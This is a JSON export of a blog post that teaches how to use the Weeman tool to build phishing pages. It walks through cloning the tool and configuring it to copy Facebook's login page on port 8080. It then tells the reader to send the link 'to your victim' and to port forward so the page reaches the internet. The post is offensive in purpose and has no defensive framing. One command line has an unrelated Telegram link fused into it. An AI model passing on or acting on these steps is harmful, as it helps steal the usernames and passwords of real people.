{"id":913,"date":"2020-05-18T06:57:59","date_gmt":"2020-05-18T05:57:59","guid":{"rendered":"http:\/\/zerothcode.com\/blog\/?p=913"},"modified":"2020-05-18T06:57:59","modified_gmt":"2020-05-18T05:57:59","slug":"weeman-best-tool-creating-phishing-pages","status":"publish","type":"post","link":"https:\/\/zerothcode.com\/blog\/weeman-best-tool-creating-phishing-pages\/","title":{"rendered":"Weeman: Best Tool For Creating Phishing Pages"},"content":{"rendered":"<p><em><strong> Phishing Pages Today\u2019s tutorial is related to a tool called Weeman. I found this tool while searching for some other tools and I found this very useful.<\/strong><\/em><\/p>\n<p><strong>What is Phishing ?<\/strong><\/p>\n<p><b>Phishing<\/b> is the fraudulent attempt to obtain sensitive information such as usernames, passwords and credit card details by disguising oneself as a trustworthy entity in an electronic communication. Phishing Pages Phishing Pages<\/p>\n<p><strong><span class=\"mycode_size\"><span class=\"mycode_b\">What is Weeman ?<\/span><\/span><\/strong><\/p>\n<h3>Weeman is HTTP server written in python for creating phishing pages.<\/h3>\n<p><strong><span class=\"mycode_size\"><span class=\"mycode_b\">How Weeman Works ?\u00a0<\/span><\/span><\/strong><\/p>\n<p>Create fake html page.<br \/>\nWait for clients<br \/>\nGrab the data (POST). Phishing Pages<br \/>\nTry to login the client to the original page<\/p>\n<p><strong><span class=\"mycode_size\"><span class=\"mycode_b\">Things we need<\/span><\/span><\/strong><\/p>\n<p>Any Linux operating system with Python 2.7 installed. In my case I am using Kali Linux 2.<br \/>\nInternet Connection. Phishing Pages<\/p>\n<p><strong><span class=\"mycode_size\"><span class=\"mycode_b\">Follow the given tutorial<\/span><\/span><\/strong><\/p>\n<p>1. First we will download the Weeman tool, for this open your terminal and \u00a0type the following commands<\/p>\n<blockquote class=\"mycode_quote\"><p><span class=\"mycode_color\">git clone\u00a0<a class=\"mycode_url\" href=\"https:\/\/github.com\/Hypsurus\/weeman\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/github.com\/Hypsurus\/weeman<\/a><\/span><\/p><\/blockquote>\n<p>2. Now change the directory to download weeman directory.<\/p>\n<blockquote class=\"mycode_quote\"><p><span class=\"mycode_color\">cd weeman<\/span><\/p><\/blockquote>\n<p>3. Open weeman using following command.<\/p>\n<blockquote><p>.\/weeman.pyhttps:\/\/t.me\/ExploitWizer<\/p><\/blockquote>\n<div class=\"mycode_align\"><img decoding=\"async\" class=\"mycode_img\" src=\"https:\/\/1.bp.blogspot.com\/-rJNo6jOrG7I\/V-54RFPD4-I\/AAAAAAAAA60\/sg7IaCtX3D8xYSiH0dPCXZRO7UdwHFO2wCLcB\/s400\/p1.png\" alt=\"[Image: p1.png]\" \/><\/div>\n<p>4. Now type the following commands to create the phishing page of the website.<\/p>\n<blockquote class=\"mycode_quote\"><p><span class=\"mycode_color\">set url\u00a0<a class=\"mycode_url\" href=\"http:\/\/www.facebook.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/www.facebook.com<\/a><br \/>\nset port 8080<br \/>\nset action_url\u00a0<a class=\"mycode_url\" href=\"http:\/\/www.facebook.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/www.facebook.com<\/a><br \/>\nrun<\/span><\/p><\/blockquote>\n<p>here you can change\u00a0<a class=\"mycode_url\" href=\"http:\/\/www.facebook.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/www.facebook.com<\/a>\u00a0to any other site which you want to clone.<\/p>\n<div class=\"mycode_align\"><img decoding=\"async\" class=\"mycode_img\" src=\"https:\/\/4.bp.blogspot.com\/-IQHXYnKuIqc\/V-552MC6T0I\/AAAAAAAAA7A\/YT7jT9ob3c4aVI6Ut0zTEbjn7-dkzfc-QCLcB\/s400\/p2.png\" alt=\"[Image: p2.png]\" \/><\/div>\n<p>5. Now send the your ipaddress as a link to your victim.<\/p>\n<blockquote class=\"mycode_quote\"><p><span class=\"mycode_color\">Example 192.168.2.13:8080<\/span><\/p><\/blockquote>\n<p>You can also use your public ip to make it work on WAN or internet but you have to port forward your router.<\/p>\n<p><strong><span class=\"mycode_size\"><span class=\"mycode_b\">Note:<\/span><\/span><\/strong><br \/>\n<em><strong>1. Make sure net is connected.<\/strong><\/em><br \/>\n<em><strong>2. Python must be installed.<\/strong><\/em><\/p>\n<p>&nbsp;<\/p>\n<p>You May Also Read : <a href=\"http:\/\/zerothcode.com\/blog\/proxy-site-access-access-blocked\/\">http:\/\/zerothcode.com\/blog\/proxy-site-access-access-blocked\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Phishing Pages Today\u2019s tutorial is related to a tool called Weeman. I found this tool while searching for some other<\/p>\n","protected":false},"author":1,"featured_media":914,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[51],"tags":[],"yst_prominent_words":[1157,1381,396,886,1371,1380,1158,1377,1379,107,531,1335,1375,1383,1382,656,1376,564,1378,134],"class_list":["post-913","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tutorials"],"_links":{"self":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/913","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/comments?post=913"}],"version-history":[{"count":0,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/913\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media\/914"}],"wp:attachment":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media?parent=913"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/categories?post=913"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/tags?post=913"},{"taxonomy":"yst_prominent_words","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/yst_prominent_words?post=913"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}